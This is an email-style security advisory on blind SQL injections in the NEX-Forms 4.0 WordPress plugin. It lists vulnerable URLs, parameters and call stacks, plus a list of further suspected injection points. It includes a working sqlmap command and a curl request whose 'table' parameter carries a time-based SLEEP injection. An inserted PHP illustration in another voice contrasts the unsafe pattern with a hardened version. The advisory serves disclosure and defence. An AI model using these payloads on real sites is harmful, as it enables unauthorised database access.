Subject: Blind SQL injections in NEX-Forms 4.0
Date: Thu, 16 Jul 2015 11:21:19 +0200

Hello,

Plugin: NEX-Forms 4.0 https://wordpress.org/plugins/nex-forms-express-wp-form-builder/

Unauthenticated attackers and authenticated users can inject arbitrary SQL commands. Please also note that there appears to be no administrator privilege check, so anyone can mess with forms.


1. SQL injection (generate_csv())

This one is for unauthenticated users.

Method: GET/POST
Url: http://localhost/wp-admin/admin.php?page=nex-forms-main&export_nex_form=1&nex_forms_Id=1
Vulnerable parameter: nex_forms_Id

Example PHP callstack:
  CSVExport::__construct   [/nex-forms-express-wp-form-builder/main.php:374]
  CSVExport::generate_csv   [/nex-forms-express-wp-form-builder/main.php:446]
  wpdb::get_results

Verification:

sqlmap --dbms mysql -u "http://localhost/wp-admin/admin.php?page=nex-forms-main&export_nex_form=1&nex_forms_Id=1" -p nex_forms_Id

...
Parameter: nex_forms_Id (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: page=nex-forms-main&export_nex_form=1&nex_forms_Id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))Pzof)
...



2. SQL injection (IZC_Database::populate_dropdown_list())

This one is for authenticated users.

Method:  POST
Url: http://localhost/wp-admin/admin-ajax.php?action=populate_dropdown&Id=1
Vulnerable parameters: table,Id

Example PHP callstack:
  Module_Admin::__construct   [/nex-forms-express-wp-form-builder/includes/Core/class.admin.php:21]
  Module_Admin::add_new   [/nex-forms-express-wp-form-builder/includes/Core/class.admin.php:50]
  IZC_Template::build_dropdown   [/nex-forms-express-wp-form-builder/includes/Core/class.template.php:428]
  IZC_Database::populate_dropdown_list   [/nex-forms-express-wp-form-builder/includes/Core/class.db.php:397]
  wpdb::get_results

Verification:

curl --cookie "..." --data "table=posts where 1=(select * from (select sleep(5))X);-- -&plugin_alias=x" --request POST "http://localhost/wp-admin/admin-ajax.php?action=populate_dropdown&Id=1"
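For the two verified issues above (an untrusted id in generate_csv() and an untrusted table name in populate_dropdown_list(), both ending in wpdb::get_results), here is an added illustration of the unsafe query pattern next to a hardened handler. This is not the plugin's code; the function names, table names, nonce action and hook name are assumptions.

```php
<?php
// Added illustration, not NEX-Forms code: a hypothetical WordPress handler
// showing the unsafe pattern the advisory describes (request parameters
// concatenated into SQL passed to wpdb::get_results) beside a fixed version.

// Unsafe: no capability check, and both the table name and the id are
// interpolated straight into the query, the shape of bugs 1 and 2 above.
function unsafe_export_rows($wpdb, $table, $id) {
    return $wpdb->get_results(
        "SELECT * FROM {$wpdb->prefix}{$table} WHERE nex_forms_Id = {$id}"
    );
}

// Hardened: the caller must be privileged, the table name is restricted to a
// fixed allow-list (identifiers cannot be bound as placeholders, so prepare()
// alone does not help for the "table" parameter), and the id is bound as an
// integer through $wpdb->prepare().
function safe_export_rows($wpdb, $table, $id) {
    if (!current_user_can('manage_options')) {
        wp_die('Insufficient privileges', '', array('response' => 403));
    }
    // Allow-list of table suffixes this exporter may read (assumed names).
    $allowed_tables = array('nex_forms', 'nex_forms_entries');
    if (!in_array($table, $allowed_tables, true)) {
        wp_die('Unknown table', '', array('response' => 400));
    }
    $id = absint($id);
    if ($id === 0) {
        wp_die('Invalid id', '', array('response' => 400));
    }
    $sql = $wpdb->prepare(
        "SELECT * FROM {$wpdb->prefix}{$table} WHERE nex_forms_Id = %d",
        $id
    );
    return $wpdb->get_results($sql);
}

// Request wiring: a nonce check stops a logged-in admin from being driven to
// the export by a crafted link; the allow-list and prepare() stop injection.
function handle_export_request() {
    global $wpdb;
    check_admin_referer('nex_forms_export'); // assumed nonce action name
    $table = isset($_GET['table']) ? sanitize_key($_GET['table']) : 'nex_forms';
    $id    = isset($_GET['nex_forms_Id']) ? $_GET['nex_forms_Id'] : 0;
    $rows  = safe_export_rows($wpdb, $table, $id);
    // ... hand $rows to the CSV writer
}
add_action('admin_post_nex_forms_export', 'handle_export_request'); // assumed hook
```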



3. Other possible SQL injections.

Sorry, I haven't had time to do sqlmap/curl verification; however, they seem to be exploitable.

* IZC_Template::get_total_records() (e.g. invoked by IZC_Template::build_admin_table_pagination()) params: table, nex_forms_id, additional_params

* IZC_Database::do_insert() params: table

* submit_nex_form() params: nex_forms_id

* IZC_Database::list_items() params: table

* NEXForms_admin::build_form_data_table() params: form_Id

* NEXForms_form_entries::get_total_form_entries() (e.g. invoked by NEXForms_form_entries::build_form_data_table()) params: wa_form_Id

* Plugin_Admin::add_new() params: Id

* IZC_Database::load_nex_form_attr() params: form_Id

* IZC_Database::load_nex_form_hidden_fields() params: form_Id

* IZC_Database::delete_record() params: Id

-- 
Regards,
Marcin Probola,